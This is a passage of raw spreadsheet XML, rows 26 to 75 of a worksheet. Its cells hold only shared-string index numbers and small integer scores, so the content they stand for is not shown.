      <c r="G26" s="3" t="s">
        <v>540</v>
      </c>
      <c r="H26" s="11">
        <v>0</v>
      </c>
      <c r="I26" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="27" spans="1:9" ht="330" x14ac:dyDescent="0.2">
      <c r="A27" s="1" t="s">
        <v>61</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>570</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>62</v>
      </c>
      <c r="D27" s="11">
        <v>2</v>
      </c>
      <c r="E27" s="3" t="s">
        <v>537</v>
      </c>
      <c r="F27" s="11">
        <v>4</v>
      </c>
      <c r="G27" s="3" t="s">
        <v>540</v>
      </c>
      <c r="H27" s="11">
        <v>0</v>
      </c>
      <c r="I27" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="28" spans="1:9" ht="285" x14ac:dyDescent="0.2">
      <c r="A28" s="1" t="s">
        <v>63</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>569</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>64</v>
      </c>
      <c r="D28" s="11">
        <v>2</v>
      </c>
      <c r="E28" s="3" t="s">
        <v>541</v>
      </c>
      <c r="F28" s="11">
        <v>0</v>
      </c>
      <c r="G28" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H28" s="11">
        <v>0</v>
      </c>
      <c r="I28" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="29" spans="1:9" ht="195" x14ac:dyDescent="0.2">
      <c r="A29" s="1" t="s">
        <v>65</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>569</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>66</v>
      </c>
      <c r="D29" s="11">
        <v>1</v>
      </c>
      <c r="E29" s="3" t="s">
        <v>543</v>
      </c>
      <c r="F29" s="11">
        <v>1</v>
      </c>
      <c r="G29" s="3" t="s">
        <v>546</v>
      </c>
      <c r="H29" s="11">
        <v>0</v>
      </c>
      <c r="I29" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="30" spans="1:9" ht="330" x14ac:dyDescent="0.2">
      <c r="A30" s="1" t="s">
        <v>67</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>569</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>68</v>
      </c>
      <c r="D30" s="11">
        <v>3</v>
      </c>
      <c r="E30" s="3" t="s">
        <v>551</v>
      </c>
      <c r="F30" s="11">
        <v>4</v>
      </c>
      <c r="G30" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H30" s="11">
        <v>2</v>
      </c>
      <c r="I30" s="3" t="s">
        <v>442</v>
      </c>
    </row>
    <row r="31" spans="1:9" ht="240" x14ac:dyDescent="0.2">
      <c r="A31" s="1" t="s">
        <v>71</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D31" s="11">
        <v>1</v>
      </c>
      <c r="E31" s="3" t="s">
        <v>451</v>
      </c>
      <c r="F31" s="11">
        <v>0</v>
      </c>
      <c r="G31" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H31" s="11">
        <v>0</v>
      </c>
      <c r="I31" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="32" spans="1:9" ht="255" x14ac:dyDescent="0.2">
      <c r="A32" s="1" t="s">
        <v>73</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>74</v>
      </c>
      <c r="D32" s="11">
        <v>1</v>
      </c>
      <c r="E32" s="3" t="s">
        <v>444</v>
      </c>
      <c r="F32" s="11">
        <v>0</v>
      </c>
      <c r="G32" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H32" s="11">
        <v>1</v>
      </c>
      <c r="I32" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="33" spans="1:9" ht="285" x14ac:dyDescent="0.2">
      <c r="A33" s="1" t="s">
        <v>75</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>570</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>76</v>
      </c>
      <c r="D33" s="11">
        <v>3</v>
      </c>
      <c r="E33" s="3" t="s">
        <v>482</v>
      </c>
      <c r="F33" s="11">
        <v>0</v>
      </c>
      <c r="G33" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H33" s="11">
        <v>0</v>
      </c>
      <c r="I33" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="34" spans="1:9" ht="300" x14ac:dyDescent="0.2">
      <c r="A34" s="1" t="s">
        <v>404</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>77</v>
      </c>
      <c r="D34" s="11">
        <v>1</v>
      </c>
      <c r="E34" s="3" t="s">
        <v>483</v>
      </c>
      <c r="F34" s="11">
        <v>0</v>
      </c>
      <c r="G34" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H34" s="11">
        <v>1</v>
      </c>
      <c r="I34" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="35" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A35" s="1" t="s">
        <v>78</v>
      </c>
      <c r="B35" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>79</v>
      </c>
      <c r="D35" s="11">
        <v>2</v>
      </c>
      <c r="E35" s="3" t="s">
        <v>490</v>
      </c>
      <c r="F35" s="11">
        <v>0</v>
      </c>
      <c r="G35" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H35" s="11">
        <v>1</v>
      </c>
      <c r="I35" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="36" spans="1:9" ht="45" x14ac:dyDescent="0.2">
      <c r="A36" s="1" t="s">
        <v>80</v>
      </c>
      <c r="B36" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>81</v>
      </c>
      <c r="D36" s="11">
        <v>4</v>
      </c>
      <c r="E36" s="3" t="s">
        <v>503</v>
      </c>
      <c r="F36" s="11">
        <v>0</v>
      </c>
      <c r="G36" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H36" s="11">
        <v>1</v>
      </c>
      <c r="I36" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="37" spans="1:9" ht="195" x14ac:dyDescent="0.2">
      <c r="A37" s="1" t="s">
        <v>82</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>83</v>
      </c>
      <c r="D37" s="11">
        <v>2</v>
      </c>
      <c r="E37" s="3" t="s">
        <v>506</v>
      </c>
      <c r="F37" s="11">
        <v>0</v>
      </c>
      <c r="G37" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H37" s="11">
        <v>1</v>
      </c>
      <c r="I37" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="38" spans="1:9" ht="180" x14ac:dyDescent="0.2">
      <c r="A38" s="1" t="s">
        <v>84</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>85</v>
      </c>
      <c r="D38" s="11">
        <v>2</v>
      </c>
      <c r="E38" s="3" t="s">
        <v>516</v>
      </c>
      <c r="F38" s="11">
        <v>0</v>
      </c>
      <c r="G38" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H38" s="11">
        <v>0</v>
      </c>
      <c r="I38" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="39" spans="1:9" ht="315" x14ac:dyDescent="0.2">
      <c r="A39" s="1" t="s">
        <v>86</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>87</v>
      </c>
      <c r="D39" s="11">
        <v>2</v>
      </c>
      <c r="E39" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F39" s="11">
        <v>3</v>
      </c>
      <c r="G39" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H39" s="11">
        <v>1</v>
      </c>
      <c r="I39" s="3" t="s">
        <v>520</v>
      </c>
    </row>
    <row r="40" spans="1:9" ht="240" x14ac:dyDescent="0.2">
      <c r="A40" s="1" t="s">
        <v>88</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>89</v>
      </c>
      <c r="D40" s="11">
        <v>2</v>
      </c>
      <c r="E40" s="3" t="s">
        <v>527</v>
      </c>
      <c r="F40" s="11">
        <v>0</v>
      </c>
      <c r="G40" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H40" s="11">
        <v>2</v>
      </c>
      <c r="I40" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="41" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A41" s="1" t="s">
        <v>90</v>
      </c>
      <c r="B41" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>91</v>
      </c>
      <c r="D41" s="11">
        <v>1</v>
      </c>
      <c r="E41" s="3" t="s">
        <v>527</v>
      </c>
      <c r="F41" s="11">
        <v>0</v>
      </c>
      <c r="G41" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H41" s="11">
        <v>2</v>
      </c>
      <c r="I41" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="42" spans="1:9" ht="345" x14ac:dyDescent="0.2">
      <c r="A42" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>93</v>
      </c>
      <c r="D42" s="11">
        <v>2</v>
      </c>
      <c r="E42" s="3" t="s">
        <v>527</v>
      </c>
      <c r="F42" s="11">
        <v>0</v>
      </c>
      <c r="G42" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H42" s="11">
        <v>2</v>
      </c>
      <c r="I42" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="43" spans="1:9" ht="240" x14ac:dyDescent="0.2">
      <c r="A43" s="1" t="s">
        <v>94</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>95</v>
      </c>
      <c r="D43" s="11">
        <v>2</v>
      </c>
      <c r="E43" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F43" s="11">
        <v>0</v>
      </c>
      <c r="G43" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H43" s="11">
        <v>2</v>
      </c>
      <c r="I43" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="44" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A44" s="1" t="s">
        <v>96</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>97</v>
      </c>
      <c r="D44" s="11">
        <v>2</v>
      </c>
      <c r="E44" s="3" t="s">
        <v>521</v>
      </c>
      <c r="F44" s="11">
        <v>0</v>
      </c>
      <c r="G44" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H44" s="11">
        <v>2</v>
      </c>
      <c r="I44" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="45" spans="1:9" ht="330" x14ac:dyDescent="0.2">
      <c r="A45" s="1" t="s">
        <v>98</v>
      </c>
      <c r="B45" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>99</v>
      </c>
      <c r="D45" s="11">
        <v>3</v>
      </c>
      <c r="E45" s="3" t="s">
        <v>527</v>
      </c>
      <c r="F45" s="11">
        <v>0</v>
      </c>
      <c r="G45" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H45" s="11">
        <v>2</v>
      </c>
      <c r="I45" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="46" spans="1:9" ht="330" x14ac:dyDescent="0.2">
      <c r="A46" s="1" t="s">
        <v>98</v>
      </c>
      <c r="B46" s="1" t="s">
        <v>570</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>99</v>
      </c>
      <c r="D46" s="11">
        <v>3</v>
      </c>
      <c r="E46" s="3" t="s">
        <v>527</v>
      </c>
      <c r="F46" s="11">
        <v>0</v>
      </c>
      <c r="G46" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H46" s="11">
        <v>0</v>
      </c>
      <c r="I46" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="47" spans="1:9" ht="90" x14ac:dyDescent="0.2">
      <c r="A47" s="1" t="s">
        <v>100</v>
      </c>
      <c r="B47" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>101</v>
      </c>
      <c r="D47" s="11">
        <v>1</v>
      </c>
      <c r="E47" s="3" t="s">
        <v>526</v>
      </c>
      <c r="F47" s="11">
        <v>0</v>
      </c>
      <c r="G47" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H47" s="11">
        <v>2</v>
      </c>
      <c r="I47" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="48" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A48" s="1" t="s">
        <v>102</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>103</v>
      </c>
      <c r="D48" s="11">
        <v>3</v>
      </c>
      <c r="E48" s="3" t="s">
        <v>526</v>
      </c>
      <c r="F48" s="11">
        <v>0</v>
      </c>
      <c r="G48" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H48" s="11">
        <v>2</v>
      </c>
      <c r="I48" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="49" spans="1:9" ht="270" x14ac:dyDescent="0.2">
      <c r="A49" s="1" t="s">
        <v>104</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>105</v>
      </c>
      <c r="D49" s="11">
        <v>3</v>
      </c>
      <c r="E49" s="3" t="s">
        <v>547</v>
      </c>
      <c r="F49" s="11">
        <v>0</v>
      </c>
      <c r="G49" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H49" s="11">
        <v>0</v>
      </c>
      <c r="I49" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="50" spans="1:9" ht="120" x14ac:dyDescent="0.2">
      <c r="A50" s="1" t="s">
        <v>106</v>
      </c>
      <c r="B50" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D50" s="11">
        <v>1</v>
      </c>
      <c r="E50" s="3" t="s">
        <v>521</v>
      </c>
      <c r="F50" s="11">
        <v>0</v>
      </c>
      <c r="G50" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H50" s="11">
        <v>2</v>
      </c>
      <c r="I50" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="51" spans="1:9" ht="409.5" x14ac:dyDescent="0.2">
      <c r="A51" s="1" t="s">
        <v>108</v>
      </c>
      <c r="B51" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>109</v>
      </c>
      <c r="D51" s="11">
        <v>2</v>
      </c>
      <c r="E51" s="3" t="s">
        <v>472</v>
      </c>
      <c r="F51" s="11">
        <v>0</v>
      </c>
      <c r="G51" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H51" s="11">
        <v>0</v>
      </c>
      <c r="I51" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="52" spans="1:9" ht="150" x14ac:dyDescent="0.2">
      <c r="A52" s="1" t="s">
        <v>110</v>
      </c>
      <c r="B52" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>111</v>
      </c>
      <c r="D52" s="11">
        <v>4</v>
      </c>
      <c r="E52" s="3" t="s">
        <v>550</v>
      </c>
      <c r="F52" s="11">
        <v>4</v>
      </c>
      <c r="G52" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H52" s="11">
        <v>2</v>
      </c>
      <c r="I52" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="53" spans="1:9" ht="165" x14ac:dyDescent="0.2">
      <c r="A53" s="1" t="s">
        <v>112</v>
      </c>
      <c r="B53" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>113</v>
      </c>
      <c r="D53" s="11">
        <v>3</v>
      </c>
      <c r="E53" s="3" t="s">
        <v>555</v>
      </c>
      <c r="F53" s="11">
        <v>0</v>
      </c>
      <c r="G53" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H53" s="11">
        <v>2</v>
      </c>
      <c r="I53" s="3" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="54" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A54" s="1" t="s">
        <v>114</v>
      </c>
      <c r="B54" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C54" s="1" t="s">
        <v>115</v>
      </c>
      <c r="D54" s="11">
        <v>3</v>
      </c>
      <c r="E54" s="3" t="s">
        <v>557</v>
      </c>
      <c r="F54" s="11">
        <v>0</v>
      </c>
      <c r="G54" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H54" s="11">
        <v>2</v>
      </c>
      <c r="I54" s="3" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="55" spans="1:9" ht="409.5" x14ac:dyDescent="0.2">
      <c r="A55" s="1" t="s">
        <v>118</v>
      </c>
      <c r="B55" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C55" s="1" t="s">
        <v>119</v>
      </c>
      <c r="D55" s="11">
        <v>3</v>
      </c>
      <c r="E55" s="1" t="s">
        <v>424</v>
      </c>
      <c r="F55" s="11">
        <v>3</v>
      </c>
      <c r="G55" s="3" t="s">
        <v>425</v>
      </c>
      <c r="H55" s="11">
        <v>2</v>
      </c>
      <c r="I55" s="3" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="56" spans="1:9" ht="210" x14ac:dyDescent="0.2">
      <c r="A56" s="1" t="s">
        <v>120</v>
      </c>
      <c r="B56" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C56" s="1" t="s">
        <v>121</v>
      </c>
      <c r="D56" s="11">
        <v>1</v>
      </c>
      <c r="E56" s="3" t="s">
        <v>434</v>
      </c>
      <c r="F56" s="11">
        <v>0</v>
      </c>
      <c r="G56" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H56" s="11">
        <v>0</v>
      </c>
      <c r="I56" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="57" spans="1:9" ht="195" x14ac:dyDescent="0.2">
      <c r="A57" s="1" t="s">
        <v>122</v>
      </c>
      <c r="B57" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C57" s="1" t="s">
        <v>123</v>
      </c>
      <c r="D57" s="11">
        <v>1</v>
      </c>
      <c r="E57" s="3" t="s">
        <v>434</v>
      </c>
      <c r="F57" s="11">
        <v>0</v>
      </c>
      <c r="G57" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H57" s="11">
        <v>0</v>
      </c>
      <c r="I57" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="58" spans="1:9" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A58" s="1" t="s">
        <v>124</v>
      </c>
      <c r="B58" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C58" s="1" t="s">
        <v>125</v>
      </c>
      <c r="D58" s="11">
        <v>3</v>
      </c>
      <c r="E58" s="3" t="s">
        <v>436</v>
      </c>
      <c r="F58" s="11">
        <v>0</v>
      </c>
      <c r="G58" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H58" s="11">
        <v>0</v>
      </c>
      <c r="I58" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="59" spans="1:9" ht="150" x14ac:dyDescent="0.2">
      <c r="A59" s="1" t="s">
        <v>126</v>
      </c>
      <c r="B59" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>127</v>
      </c>
      <c r="D59" s="11">
        <v>3</v>
      </c>
      <c r="E59" s="3" t="s">
        <v>437</v>
      </c>
      <c r="F59" s="11">
        <v>0</v>
      </c>
      <c r="G59" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H59" s="11">
        <v>0</v>
      </c>
      <c r="I59" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="60" spans="1:9" ht="315" x14ac:dyDescent="0.2">
      <c r="A60" s="1" t="s">
        <v>128</v>
      </c>
      <c r="B60" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>129</v>
      </c>
      <c r="D60" s="11">
        <v>3</v>
      </c>
      <c r="E60" s="3" t="s">
        <v>435</v>
      </c>
      <c r="F60" s="11">
        <v>0</v>
      </c>
      <c r="G60" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H60" s="11">
        <v>0</v>
      </c>
      <c r="I60" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="61" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A61" s="1" t="s">
        <v>130</v>
      </c>
      <c r="B61" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C61" s="1" t="s">
        <v>131</v>
      </c>
      <c r="D61" s="11">
        <v>1</v>
      </c>
      <c r="E61" s="3" t="s">
        <v>444</v>
      </c>
      <c r="F61" s="11">
        <v>0</v>
      </c>
      <c r="G61" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H61" s="11">
        <v>0</v>
      </c>
      <c r="I61" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="62" spans="1:9" ht="240" x14ac:dyDescent="0.2">
      <c r="A62" s="1" t="s">
        <v>132</v>
      </c>
      <c r="B62" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>133</v>
      </c>
      <c r="D62" s="11">
        <v>4</v>
      </c>
      <c r="E62" s="3" t="s">
        <v>445</v>
      </c>
      <c r="F62" s="11">
        <v>3</v>
      </c>
      <c r="G62" s="3" t="s">
        <v>446</v>
      </c>
      <c r="H62" s="11">
        <v>0</v>
      </c>
      <c r="I62" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="63" spans="1:9" ht="285" x14ac:dyDescent="0.2">
      <c r="A63" s="1" t="s">
        <v>134</v>
      </c>
      <c r="B63" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>135</v>
      </c>
      <c r="D63" s="11">
        <v>4</v>
      </c>
      <c r="E63" s="3" t="s">
        <v>448</v>
      </c>
      <c r="F63" s="11">
        <v>0</v>
      </c>
      <c r="G63" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H63" s="11">
        <v>0</v>
      </c>
      <c r="I63" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="64" spans="1:9" ht="135" x14ac:dyDescent="0.2">
      <c r="A64" s="1" t="s">
        <v>136</v>
      </c>
      <c r="B64" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C64" s="1" t="s">
        <v>137</v>
      </c>
      <c r="D64" s="11">
        <v>1</v>
      </c>
      <c r="E64" s="3" t="s">
        <v>452</v>
      </c>
      <c r="F64" s="11">
        <v>0</v>
      </c>
      <c r="G64" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H64" s="11">
        <v>0</v>
      </c>
      <c r="I64" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="65" spans="1:9" ht="195" x14ac:dyDescent="0.2">
      <c r="A65" s="1" t="s">
        <v>138</v>
      </c>
      <c r="B65" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>139</v>
      </c>
      <c r="D65" s="11">
        <v>2</v>
      </c>
      <c r="E65" s="3" t="s">
        <v>458</v>
      </c>
      <c r="F65" s="11">
        <v>0</v>
      </c>
      <c r="G65" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H65" s="11">
        <v>0</v>
      </c>
      <c r="I65" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="66" spans="1:9" ht="75" x14ac:dyDescent="0.2">
      <c r="A66" s="1" t="s">
        <v>140</v>
      </c>
      <c r="B66" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C66" s="1" t="s">
        <v>141</v>
      </c>
      <c r="D66" s="11">
        <v>3</v>
      </c>
      <c r="E66" s="3" t="s">
        <v>460</v>
      </c>
      <c r="F66" s="11">
        <v>0</v>
      </c>
      <c r="G66" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H66" s="11">
        <v>0</v>
      </c>
      <c r="I66" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="67" spans="1:9" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A67" s="1" t="s">
        <v>142</v>
      </c>
      <c r="B67" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C67" s="1" t="s">
        <v>143</v>
      </c>
      <c r="D67" s="11">
        <v>3</v>
      </c>
      <c r="E67" s="3" t="s">
        <v>476</v>
      </c>
      <c r="F67" s="11">
        <v>0</v>
      </c>
      <c r="G67" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H67" s="11">
        <v>0</v>
      </c>
      <c r="I67" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="68" spans="1:9" ht="180" x14ac:dyDescent="0.2">
      <c r="A68" s="1" t="s">
        <v>144</v>
      </c>
      <c r="B68" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C68" s="1" t="s">
        <v>145</v>
      </c>
      <c r="D68" s="11">
        <v>2</v>
      </c>
      <c r="E68" s="3" t="s">
        <v>494</v>
      </c>
      <c r="F68" s="11">
        <v>2</v>
      </c>
      <c r="G68" s="3" t="s">
        <v>439</v>
      </c>
      <c r="H68" s="11">
        <v>0</v>
      </c>
      <c r="I68" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="69" spans="1:9" ht="210" x14ac:dyDescent="0.2">
      <c r="A69" s="1" t="s">
        <v>146</v>
      </c>
      <c r="B69" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C69" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D69" s="11">
        <v>2</v>
      </c>
      <c r="E69" s="3" t="s">
        <v>496</v>
      </c>
      <c r="F69" s="11">
        <v>0</v>
      </c>
      <c r="G69" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H69" s="11">
        <v>0</v>
      </c>
      <c r="I69" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="70" spans="1:9" ht="390" x14ac:dyDescent="0.2">
      <c r="A70" s="1" t="s">
        <v>148</v>
      </c>
      <c r="B70" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C70" s="1" t="s">
        <v>149</v>
      </c>
      <c r="D70" s="11">
        <v>2</v>
      </c>
      <c r="E70" s="3" t="s">
        <v>504</v>
      </c>
      <c r="F70" s="11">
        <v>0</v>
      </c>
      <c r="G70" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H70" s="11">
        <v>0</v>
      </c>
      <c r="I70" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="71" spans="1:9" ht="105" x14ac:dyDescent="0.2">
      <c r="A71" s="1" t="s">
        <v>150</v>
      </c>
      <c r="B71" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C71" s="1" t="s">
        <v>151</v>
      </c>
      <c r="D71" s="11">
        <v>1</v>
      </c>
      <c r="E71" s="3" t="s">
        <v>505</v>
      </c>
      <c r="F71" s="11">
        <v>0</v>
      </c>
      <c r="G71" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H71" s="11">
        <v>0</v>
      </c>
      <c r="I71" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="72" spans="1:9" ht="330" x14ac:dyDescent="0.2">
      <c r="A72" s="1" t="s">
        <v>152</v>
      </c>
      <c r="B72" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C72" s="1" t="s">
        <v>153</v>
      </c>
      <c r="D72" s="11">
        <v>1</v>
      </c>
      <c r="E72" s="3" t="s">
        <v>506</v>
      </c>
      <c r="F72" s="11">
        <v>0</v>
      </c>
      <c r="G72" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H72" s="11">
        <v>1</v>
      </c>
      <c r="I72" s="3" t="s">
        <v>507</v>
      </c>
    </row>
    <row r="73" spans="1:9" ht="180" x14ac:dyDescent="0.2">
      <c r="A73" s="1" t="s">
        <v>84</v>
      </c>
      <c r="B73" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C73" s="1" t="s">
        <v>85</v>
      </c>
      <c r="D73" s="11">
        <v>2</v>
      </c>
      <c r="E73" s="3" t="s">
        <v>516</v>
      </c>
      <c r="F73" s="11">
        <v>0</v>
      </c>
      <c r="G73" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H73" s="11">
        <v>0</v>
      </c>
      <c r="I73" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="74" spans="1:9" ht="315" x14ac:dyDescent="0.2">
      <c r="A74" s="1" t="s">
        <v>154</v>
      </c>
      <c r="B74" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C74" s="1" t="s">
        <v>155</v>
      </c>
      <c r="D74" s="11">
        <v>3</v>
      </c>
      <c r="E74" s="3" t="s">
        <v>486</v>
      </c>
      <c r="F74" s="11">
        <v>0</v>
      </c>
      <c r="G74" s="3" t="s">
        <v>433</v>
      </c>
      <c r="H74" s="11">
        <v>0</v>
      </c>
      <c r="I74" s="3" t="s">
        <v>433</v>
      </c>
    </row>
    <row r="75" spans="1:9" ht="210" x14ac:dyDescent="0.2">
      <c r="A75" s="1" t="s">
        <v>156</v>
      </c>
      <c r="B75" s="1" t="s">
        <v>116</v>
      </c>
      <c r="C75" s="1" t="s">
        <v>157</v>
      </c>
      <c r="D75" s="11">
        <v>2</v>
      </c>
